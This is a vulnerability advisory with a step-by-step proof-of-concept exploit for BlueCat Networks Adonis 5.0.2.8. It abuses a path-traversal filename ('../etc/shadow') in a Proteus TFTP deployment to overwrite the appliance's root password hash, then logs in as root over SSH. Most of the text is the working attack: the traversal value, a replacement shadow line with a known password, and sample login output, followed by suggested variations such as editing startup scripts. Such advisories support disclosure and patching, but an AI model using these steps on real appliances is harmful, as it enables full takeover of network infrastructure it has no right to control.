BlueCat Networks Adonis 5.0.2.8 - TFTP Privilege Escalation

source: https://www.securityfocus.com/bid/25214/info

BlueCat Networks Adonis devices are prone to a remote privilege-escalation vulnerability. This issue occurs when Proteus appliances are used to upload files to an affected Adonis appliance for TFTP download.

An attacker with administrative privileges can exploit this issue to write arbitrary data with superuser privileges. A successful attack will result in the complete compromise of an affected appliance.

Adonis 5.0.2.8 is vulnerable; other versions may also be affected. 

  0) Create a new TFTP Group in a Proteus configuration.

  1) Add a TFTP deployment role specifying an Adonis appliance to
     the group.

  2) At the top-level folder in the new TFTP group, add a file
     named "../etc/shadow" (without the quotes) and load a file
     containing the following line:

     root:Im0Zgl8tnEq9Y:13637:0:99999:7:::

     NOTE: The sshd configuration uses the default setting
     'PermitEmptyPasswords no', so we specify a password of
     bluecat.

  3) Deploy the configuration to the Adonis appliance.

  4) You can now login to the Adonis appliance as root with
     password bluecat.

     $ ssh [email protected]
     [email protected]'s password:
     # cat /etc/shadow
     root:Im0Zgl8tnEq9Y:13637:0:99999:7:::

     NOTE: This example assumes SSH is enabled, iptables permits
     port tcp/22, etc.

  Many attack variations are possible, such as changing system
  startup scripts to modify the iptables configuration on the
  appliance.